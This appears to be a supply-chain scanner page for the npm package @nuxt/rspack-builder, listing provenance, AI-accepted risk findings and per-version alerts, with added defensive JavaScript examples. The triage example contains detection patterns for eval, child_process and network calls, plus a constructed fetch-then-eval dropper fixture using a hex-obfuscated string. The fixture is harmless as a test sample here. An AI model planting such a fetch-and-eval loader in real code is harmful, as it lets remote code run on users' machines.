
@nuxt/rspack-builder

rspack bundler for Nuxt

Versions: 26
License: MIT
Install scripts: No
Provenance: Verified

Supply chain provenance

Status for the latest visible version.

SLSA provenance attestation: present
npm registry signatures: present
Source commit: none recorded

A provenance attestation binds the published tarball to the CI workflow and repository that built it; it does not vouch for the contents of that repository, and without a recorded source commit the tarball cannot be traced to a specific revision. Treat it as a necessary check, not a sufficient one: verify the signature, then compare the attested repository, workflow and builder with what you expect.
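The claims check described above, as an added example (not code from the scanner behind this page or from the Nuxt project). Signature verification is left to `npm audit signatures` or a Sigstore client; this script takes the already-verified DSSE envelope and checks what it claims against a consumer policy. The repository URL, workflow path, digests and commit are constructed placeholders, not values from the real package.

```javascript
// Added example: not code from the scanner behind this page or from the Nuxt
// project. After the attestation's signature has been verified (what
// `npm audit signatures` does), the claims INSIDE the statement still have to
// be compared against what the consumer expects. Everything below is
// constructed: repository, workflow path, digests and commit are placeholders.

const PREDICATE_SLSA_V1 = 'https://slsa.dev/provenance/v1';
const PAYLOAD_TYPE = 'application/vnd.in-toto+json';

// Consumer policy: which source and builder may produce this package (assumed values).
const EXPECTED = {
  name: '@nuxt/rspack-builder',
  version: '4.4.6',
  repository: 'https://github.com/example-org/example-monorepo', // assumed, not the real repo URL
  workflowPath: '.github/workflows/release.yml',                 // assumed
  builderIdPrefix: 'https://github.com/actions/runner/',
};

// Constructed in-toto statement in the shape of npm's SLSA v1 provenance.
const SAMPLE_STATEMENT = {
  _type: 'https://in-toto.io/Statement/v1',
  subject: [{ name: 'pkg:npm/%40nuxt/rspack-builder@4.4.6', digest: { sha512: 'ab'.repeat(64) } }],
  predicateType: PREDICATE_SLSA_V1,
  predicate: {
    buildDefinition: {
      buildType: 'https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1',
      externalParameters: {
        workflow: {
          ref: 'refs/heads/main',
          repository: 'https://github.com/example-org/example-monorepo',
          path: '.github/workflows/release.yml',
        },
      },
      resolvedDependencies: [{
        uri: 'git+https://github.com/example-org/example-monorepo@refs/heads/main',
        digest: { gitCommit: '0'.repeat(40) }, // placeholder commit
      }],
    },
    runDetails: { builder: { id: 'https://github.com/actions/runner/github-hosted' } },
  },
};

// Wrap a statement in a DSSE envelope as the registry's attestations endpoint
// returns it. Signature bytes are left empty: this script does not verify them.
function encodeEnvelope(statement) {
  return {
    payloadType: PAYLOAD_TYPE,
    payload: Buffer.from(JSON.stringify(statement)).toString('base64'),
    signatures: [{ keyid: '', sig: '' }],
  };
}

// npm's dist.integrity is "sha512-<base64>"; the attestation subject uses hex.
function integrityToHex(integrity) {
  if (!integrity.startsWith('sha512-')) return null;
  return Buffer.from(integrity.slice('sha512-'.length), 'base64').toString('hex');
}

// "pkg:npm/%40scope/name@version" -> { name, version }
function parseNpmPurl(purl) {
  const rest = decodeURIComponent(purl.replace(/^pkg:npm\//, ''));
  const at = rest.lastIndexOf('@');
  return { name: rest.slice(0, at), version: rest.slice(at + 1) };
}

// Compare attested claims with policy. Collects every mismatch instead of
// stopping at the first, and reports the attested source commit (or null).
function checkProvenance(envelope, tarballIntegrity, expected) {
  const problems = [];
  if (envelope.payloadType !== PAYLOAD_TYPE) problems.push('unexpected payloadType');
  const st = JSON.parse(Buffer.from(envelope.payload, 'base64').toString('utf8'));
  if (st.predicateType !== PREDICATE_SLSA_V1) problems.push('predicateType is not SLSA v1');

  // The subject must be THIS tarball: name, version and sha512 all match.
  const wantHex = integrityToHex(tarballIntegrity);
  const subject = (st.subject || []).find((s) => {
    const { name, version } = parseNpmPurl(s.name);
    return name === expected.name && version === expected.version;
  });
  if (!subject) problems.push('no subject for this package@version');
  else if (!wantHex || subject.digest.sha512 !== wantHex) problems.push('subject digest != tarball integrity');

  // An attestation that verifies but names a different repo or workflow is a
  // fork or a hijacked pipeline, not the build you expected.
  const bd = (st.predicate && st.predicate.buildDefinition) || {};
  const wf = (bd.externalParameters && bd.externalParameters.workflow) || {};
  if (wf.repository !== expected.repository) problems.push(`built from ${wf.repository}, expected ${expected.repository}`);
  if (wf.path !== expected.workflowPath) problems.push(`workflow ${wf.path}, expected ${expected.workflowPath}`);
  const builderId = (((st.predicate || {}).runDetails || {}).builder || {}).id || '';
  if (!builderId.startsWith(expected.builderIdPrefix)) problems.push(`builder ${builderId} not trusted`);

  // The "No source commit" case: without a resolved gitCommit the build cannot
  // be traced to a specific revision of the repository.
  const dep = (bd.resolvedDependencies || []).find((d) => d.digest && d.digest.gitCommit);
  const sourceCommit = dep ? dep.digest.gitCommit : null;
  if (!sourceCommit || !/^[0-9a-f]{40}$/.test(sourceCommit)) problems.push('no source commit in provenance');

  return { ok: problems.length === 0, problems, sourceCommit };
}

// Constructed dist.integrity that matches the sample subject digest.
const SAMPLE_INTEGRITY = 'sha512-' + Buffer.from('ab'.repeat(64), 'hex').toString('base64');

console.log(checkProvenance(encodeEnvelope(SAMPLE_STATEMENT), SAMPLE_INTEGRITY, EXPECTED));
```

For a real package, fetch the bundle from the URL that `npm view <name>@<version> dist.attestations.url` prints, pass its `dsseEnvelope` as `envelope`, and use `npm view <name>@<version> dist.integrity` as the tarball integrity. The repository and workflow in `EXPECTED` should come from your own record of where the package is supposed to be built, never from the attestation itself.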

Maintainers

nuxtbot

Accepted risks

Findings the reviewer chose to accept rather than block on.

Source | Rule | Reason | Accepted by | When
provenance | publisher-changed | AI (provenance): Nuxt monorepo publishes via GitHub Actions CI/CD with SLSA attestation; this is the expected publisher going forward. | ai |
maintainer-change | maintainer-removed | AI (maintainer-change): Nuxt team consolidated publishing to GitHub Actions; maintainer list change is intentional org-level transition. | ai |
source-diff | obfuscated-file:dist/_chunks/libs/@vue/compiler-dom.d.mts | AI (source-diff): TypeScript declaration file with long re-export lines; not obfuscated. | ai |
source-diff | obfuscated-file:dist/_chunks/libs/@babel/parser.d.mts | AI (source-diff): TypeScript declaration file for @babel/types; long union type lines are expected. | ai |
source-diff | obfuscated-file:dist/_chunks/libs/@vue/compiler-core.d.mts | AI (source-diff): TypeScript declaration file with long type union lines; not obfuscated code. | ai |
source-diff | large-new-source-files | AI (source-diff): New files are type declaration bundles for known upstream packages. | ai |
source-diff | source-size-tripled | AI (source-diff): Size increase is from bundled type declarations for Vue/Babel deps, not injected payloads. | ai |
source-diff | net-exec-file:dist/_chunks/libs/@vue/compiler-core.d.mts | AI (source-diff): False positive on a .d.mts type declaration file; no runtime network or exec calls. | ai |
phantom-deps | phantom-dep:postcss-import | AI (phantom-deps): PostCSS plugin dep passed through config, not directly imported. | ai |
phantom-deps | phantom-dep:postcss-loader | AI (phantom-deps): Rspack loader dep passed through config, not directly imported. | ai |
phantom-deps | phantom-dep:cssnano | AI (phantom-deps): Rspack builder passes loaders/plugins to user config; declared deps not directly imported is expected pattern. | ai |
bogus-package | bogus-package | AI (bogus-package): Nuxt monorepo package; README link density is from framework docs, not a link farm. | ai |
phantom-deps | phantom-dep:pug-plain-loader | AI (phantom-deps): Rspack loader dep passed through config, not directly imported. | ai |
phantom-deps | phantom-dep:postcss | AI (phantom-deps): Same pattern: build-tool deps passed through to rspack config, not directly imported. | ai |
phantom-deps | phantom-dep:css-loader | AI (phantom-deps): Webpack/rspack loader dep passed through config, not directly imported. | ai |
phantom-deps | phantom-dep:tinyglobby | AI (phantom-deps): Utility dep used indirectly via config; stable false positive for this package. | ai |
phantom-deps | phantom-dep:url-loader | AI (phantom-deps): Rspack loader dep passed through config, not directly imported. | ai |
phantom-deps | phantom-dep:file-loader | AI (phantom-deps): Rspack loader dep passed through config, not directly imported. | ai |
phantom-deps | phantom-dep:postcss-url | AI (phantom-deps): PostCSS plugin dep passed through config, not directly imported. | ai |
phantom-deps | phantom-dep:autoprefixer | AI (phantom-deps): PostCSS plugin dep passed through config, not directly imported. | ai |
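Most accepted rows above are `phantom-dep` findings with the same explanation: the dependency is handed to rspack or PostCSS by name from configuration rather than imported. The following added example (not the scanner's code) shows a phantom-dependency check that also counts string-literal and `require.resolve()` references, so only a dependency that nothing mentions is reported. The package.json, the sources and the package name `unused-example-dep` are constructed for the example.

```javascript
// Added example: not the scanner's code. A "phantom dependency" here is a
// declared dependency that no source file imports. Build tools such as rspack
// and PostCSS load loaders and plugins by NAME from configuration, so a
// detector that only looks at import/require statements reports them all.
// This version also counts string-literal and require.resolve() references,
// so only a dependency nothing mentions is reported. All inputs are
// constructed; 'unused-example-dep' is a hypothetical package name.

// Import / require / require.resolve specifiers -> owning package name.
const IMPORT_RE = /(?:\bfrom\s*|\bimport\s*\(?\s*|\brequire\s*\(\s*|\brequire\.resolve\s*\(\s*)['"]([^'"]+)['"]/g;
// Any quoted bare package name (optionally scoped), e.g. { loader: 'css-loader' }.
const NAME_RE = /['"]((?:@[\w.-]+\/)?[\w.-]+)['"]/g;

// 'pkg/sub/path' -> 'pkg'; '@scope/pkg/sub' -> '@scope/pkg'; relative and node: -> null
function packageOf(specifier) {
  if (/^(\.|\/|node:)/.test(specifier)) return null;
  const parts = specifier.split('/');
  return specifier.startsWith('@') ? parts.slice(0, 2).join('/') : parts[0];
}

function referencesIn(source) {
  const imported = new Set();
  const named = new Set();
  for (const m of source.matchAll(IMPORT_RE)) {
    const pkg = packageOf(m[1]);
    if (pkg) imported.add(pkg);
  }
  for (const m of source.matchAll(NAME_RE)) named.add(m[1]);
  return { imported, named };
}

// For each declared dependency: 'imported' | 'referenced-by-name' | 'unreferenced'.
function classifyDeps(pkgJson, sources) {
  const imported = new Set();
  const named = new Set();
  for (const src of Object.values(sources)) {
    const refs = referencesIn(src);
    refs.imported.forEach((p) => imported.add(p));
    refs.named.forEach((p) => named.add(p));
  }
  const result = {};
  for (const dep of Object.keys(pkgJson.dependencies || {})) {
    result[dep] = imported.has(dep) ? 'imported'
      : named.has(dep) ? 'referenced-by-name' : 'unreferenced';
  }
  return result;
}

// Only dependencies with no reference of any kind become findings.
function phantomFindings(pkgJson, sources) {
  return Object.entries(classifyDeps(pkgJson, sources))
    .filter(([, status]) => status === 'unreferenced')
    .map(([dep]) => dep);
}

// Constructed package.json and sources in the style of a bundler integration.
const SAMPLE_PKG = {
  dependencies: {
    'tinyglobby': '^0.2.0', 'css-loader': '^7.0.0', 'postcss-loader': '^8.0.0',
    'autoprefixer': '^10.0.0', 'url-loader': '^4.0.0', 'unused-example-dep': '^1.0.0',
  },
};
const SAMPLE_SOURCES = {
  'src/css.ts': [
    "import { glob } from 'tinyglobby'",
    'export function cssRules() {',
    "  return [{ test: /\\.css$/, use: [",
    "    { loader: 'css-loader' },",
    "    { loader: 'postcss-loader', options: { postcssOptions: { plugins: ['autoprefixer'] } } },",
    '  ] }]',
    '}',
  ].join('\n'),
  'src/assets.ts': "export const assetRule = { loader: require.resolve('url-loader'), options: { limit: 1000 } }",
};

console.log(classifyDeps(SAMPLE_PKG, SAMPLE_SOURCES));
console.log('phantom:', phantomFindings(SAMPLE_PKG, SAMPLE_SOURCES));
```

A name that is built dynamically (for example from a template string) is still missed, so a residual `unreferenced` result needs a human decision, as in the table above. Note what the risk of a true phantom dependency actually is: the package itself never loads it, but it still enters every consumer's install graph with its own install scripts and transitive dependencies.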

Versions (showing 26 of 26)

Version Deps Published
4.4.6 41 / 8
4.4.5 41 / 8
4.4.4 41 / 8
4.4.2 42 / 8
4.3.1 42 / 8
4.3.0 42 / 8
4.2.2 40 / 6
4.2.1 40 / 6
4.2.0 40 / 6
4.1.3 39 / 6
4.1.2 39 / 6
4.1.1 39 / 6
4.1.0 39 / 6
4.0.3 39 / 6
4.0.2 39 / 6
4.0.1 39 / 6
4.0.0 39 / 6
3.21.7 40 / 9
3.21.6 40 / 9
3.21.5 40 / 9
3.21.4 40 / 9
3.21.2 41 / 9
3.21.1 41 / 9
3.21.0 41 / 9
3.20.2 39 / 7
3.20.1 39 / 7

v4.4.6

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.4.5

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.4.4

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.4.2

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.3.1

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.3.0

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.2.2

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.2.1

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.2.0

2 findings
HIGH Publisher changed: danielroe → GitHub Actions (on 2025-10-25) provenance

This version was published by a different npm account than previous versions on 2025-10-25. This could indicate a legitimate maintainer transition or an account compromise.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.1.3

2 findings
HIGH Publisher changed: danielroe → GitHub Actions (on 2025-10-06) provenance

This version was published by a different npm account than previous versions on 2025-10-06. This could indicate a legitimate maintainer transition or an account compromise.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.1.2

2 findings
HIGH Publisher changed: danielroe → GitHub Actions (on 2025-09-12) provenance

This version was published by a different npm account than previous versions on 2025-09-12. This could indicate a legitimate maintainer transition or an account compromise.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.1.1

2 findings
HIGH Publisher changed: danielroe → GitHub Actions (on 2025-09-05) provenance

This version was published by a different npm account than previous versions on 2025-09-05. This could indicate a legitimate maintainer transition or an account compromise.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.1.0

2 findings
HIGH Publisher changed: danielroe → GitHub Actions (on 2025-09-02) provenance

This version was published by a different npm account than previous versions on 2025-09-02. This could indicate a legitimate maintainer transition or an account compromise.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
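The same publisher change is reported on 4.1.0, 4.1.1, 4.1.2, 4.1.3 and 4.2.0 with five different dates. The added example below (not the scanner's code) implements the check from a registry packument and shows one way that repetition arises: when the previous publish is chosen by time and an older release line is still being published by the old account, every release of the new line looks like a fresh change. The packument, dates and account names are constructed; the only thing taken from the page is that npm records the trusted-publishing account as "GitHub Actions". The severity rule is this example's own, not the scanner's.

```javascript
// Added example: not the scanner's own code. Detects a change of publishing
// account between versions from a registry packument, the check behind the
// "Publisher changed" findings above, and shows why comparing against the
// previous publish by time repeats the alert when an older release line is
// still being published. The packument is constructed: versions, dates and
// account names are illustrative, not the real history of this package.

const SLSA_V1 = 'https://slsa.dev/provenance/v1';

function human(name) { return { _npmUser: { name } }; }
// Publisher name npm records for trusted (OIDC) publishing, with a provenance
// attestation listed on dist (shape as in the registry packument).
function ci() {
  return { _npmUser: { name: 'GitHub Actions' },
           dist: { attestations: { provenance: { predicateType: SLSA_V1 } } } };
}

// Two release lines published in parallel: 3.21.x by a human account,
// 4.x by an attested CI publisher (constructed data).
const SAMPLE_PACKUMENT = {
  name: 'example-builder',
  time: {
    '3.21.0': '2025-08-20T10:00:00.000Z',
    '4.0.0':  '2025-08-25T10:00:00.000Z',
    '4.1.0':  '2025-09-02T10:00:00.000Z',
    '3.21.1': '2025-09-03T10:00:00.000Z',
    '4.1.1':  '2025-09-05T10:00:00.000Z',
    '3.21.2': '2025-09-10T10:00:00.000Z',
    '4.1.2':  '2025-09-12T10:00:00.000Z',
  },
  versions: {
    '3.21.0': human('maintainer-a'),
    '4.0.0':  ci(),
    '4.1.0':  ci(),
    '3.21.1': human('maintainer-a'),
    '4.1.1':  ci(),
    '3.21.2': human('maintainer-a'),
    '4.1.2':  ci(),
  },
};

function hasProvenance(v) {
  return !!(v.dist && v.dist.attestations && v.dist.attestations.provenance
            && v.dist.attestations.provenance.predicateType === SLSA_V1);
}

// Versions in publish order (the time map also holds 'created'/'modified'; skip those).
function publishOrder(pkg) {
  return Object.entries(pkg.time)
    .filter(([v]) => v in pkg.versions)
    .sort(([, a], [, b]) => (a < b ? -1 : a > b ? 1 : 0))
    .map(([version, date]) => ({ version, date, major: parseInt(version, 10) }));
}

// Severity used by this example (the page's scanner rates every change HIGH):
// moving to an attested CI publisher is an expected migration worth confirming;
// moving away from one, or between unattested accounts, is the dangerous direction.
function severity(prevV, curV) {
  if (hasProvenance(curV) && !hasProvenance(prevV)) return 'medium';
  return 'high';
}

function detectPublisherChanges(pkg, { perMajorLine = false } = {}) {
  const order = publishOrder(pkg);
  const findings = [];
  order.forEach((cur, i) => {
    const earlier = order.slice(0, i);
    let prev = earlier[earlier.length - 1];
    if (perMajorLine) {
      // Compare with the previous release of the same major line; the first
      // release of a new line falls back to the latest publish overall.
      prev = [...earlier].reverse().find((e) => e.major === cur.major) || prev;
    }
    if (!prev) return;
    const from = pkg.versions[prev.version]._npmUser.name;
    const to = pkg.versions[cur.version]._npmUser.name;
    if (from === to) return;
    findings.push({
      version: cur.version, date: cur.date.slice(0, 10), from, to, comparedTo: prev.version,
      severity: severity(pkg.versions[prev.version], pkg.versions[cur.version]),
    });
  });
  return findings;
}

console.log('by publish time:', detectPublisherChanges(SAMPLE_PACKUMENT));
console.log('per major line:', detectPublisherChanges(SAMPLE_PACKUMENT, { perMajorLine: true }));
```

On the constructed history the time-ordered comparison reports five changes, alternating in both directions; the per-line comparison reports one, at the first release of the 4.x line. A real packument is the JSON at `https://registry.npmjs.org/<name>`. Whichever baseline is used, a change in publishing account is a prompt to confirm with the maintainers out of band, not something an attestation alone resolves.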

v4.0.3

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.0.2

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.0.1

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v4.0.0

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.7

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.6

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.5

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.4

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.2

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.21.1

5 findings
HIGH New obfuscated file: dist/_chunks/libs/@vue/compiler-core.d.mts source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/_chunks/libs/@vue/compiler-core.d.mts source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

HIGH New obfuscated file: dist/_chunks/libs/@vue/compiler-dom.d.mts source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New obfuscated file: dist/_chunks/libs/@babel/parser.d.mts source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
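The four HIGH findings on this version all fired on `.d.mts` type declaration bundles, and the accepted-risks table records them as false positives: long union-type lines tripped the 3000-character rule, and member names like `fetch` and `exec` in an interface tripped the network-plus-execution rule. The added example below (not the scanner's code) shows a word-level match next to a triage that first asks whether the file can run at all and applies the minification and dropper heuristics only to runtime modules. The three sample files are constructed.

```javascript
// Added example: not code from the scanner or from Nuxt. Triage for the
// source-diff rules that fired on v3.21.1: "lines over 3000 chars" and
// "network + code execution" both hit TypeScript declaration bundles. A .d.mts
// file is never loaded by Node's module loader, so the first question is
// whether the file can execute at all; only runtime modules get the
// minification and dropper heuristics. All sample files are constructed.

const DECLARATION_EXT = /\.d\.[cm]?ts$/;
const RUNTIME_EXT = /\.[cm]?js$/;

// What a word-level scanner matches (any mention of these identifiers).
const NAIVE_NET = /\b(fetch|http|https)\b/;
const NAIVE_EXEC = /\b(eval|exec|Function)\b/;

// What a call-level scanner matches (an actual call or module load).
const NET_CALL = /\b(?:fetch|XMLHttpRequest|https?\.(?:request|get))\s*\(|require\(\s*['"](?:node:)?(?:https?|net|dns)['"]\s*\)/;
const EXEC_CALL = /\beval\s*\(|new\s+Function\s*\(|require\(\s*['"](?:node:)?child_process['"]\s*\)/;
const ESCAPE_SEQ = /\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}/g;

function naiveNetExec(content) {
  return NAIVE_NET.test(content) && NAIVE_EXEC.test(content);
}

function longestLine(content) {
  return content.split('\n').reduce((m, l) => Math.max(m, l.length), 0);
}

function triageNewFile(path, content) {
  const longest = longestLine(content);
  if (DECLARATION_EXT.test(path)) {
    // Type-only; long union lines are normal in bundled declarations.
    return { path, executable: false, verdict: 'info',
             reasons: [`type declarations, longest line ${longest} chars, not loaded at runtime`] };
  }
  if (!RUNTIME_EXT.test(path)) return { path, executable: false, verdict: 'info', reasons: ['not a runtime module'] };

  const reasons = [];
  const escapes = (content.match(ESCAPE_SEQ) || []).length;
  const net = NET_CALL.test(content);
  const exec = EXEC_CALL.test(content);
  if (longest > 3000) reasons.push(`line of ${longest} chars (minified or generated)`);
  if (escapes > 20) reasons.push(`${escapes} hex/unicode escapes (string obfuscation)`);
  if (net) reasons.push('network call');
  if (exec) reasons.push('dynamic code execution');
  let verdict = 'info';
  if (net && exec) verdict = 'high';                 // fetch-then-eval dropper shape
  else if (exec || escapes > 20) verdict = 'medium';
  else if (longest > 3000) verdict = 'low';          // minified but otherwise unremarkable
  return { path, executable: true, verdict, reasons };
}

// Constructed samples.
const SAMPLE_FILES = {
  // Bundled declarations: one 4000+ char union line, and "fetch"/"exec" as member names.
  'dist/_chunks/libs/example/types.d.mts':
    'export type HtmlTag = ' + Array.from({ length: 400 }, (_, i) => `'tag${i}'`).join(' | ') + ';\n'
    + 'export interface Loader { fetch(url: string): Promise<string>; exec(code: string): void; }\n',
  // Runtime module with the dropper shape: obfuscated string, fetch, then eval.
  'dist/index.mjs':
    "const h = '" + '\\x41'.repeat(25) + "'; fetch(h).then((r) => r.text()).then((t) => eval(t));\n",
  // Ordinary runtime module.
  'dist/util.mjs': 'export function add(a, b) { return a + b; }\n',
};

for (const [path, content] of Object.entries(SAMPLE_FILES)) {
  console.log(path, 'naive net+exec:', naiveNetExec(content), 'triage:', triageNewFile(path, content).verdict);
}
```

The declaration file trips the word-level check and triages to info; the constructed dropper passes every word-level check a declaration file would and triages to high. A malicious runtime file that reads a `.d.mts` and evaluates its contents would still be caught, because the `eval` call lives in the runtime module that the heuristics do inspect.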

v3.21.0

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.20.2

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.20.1

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.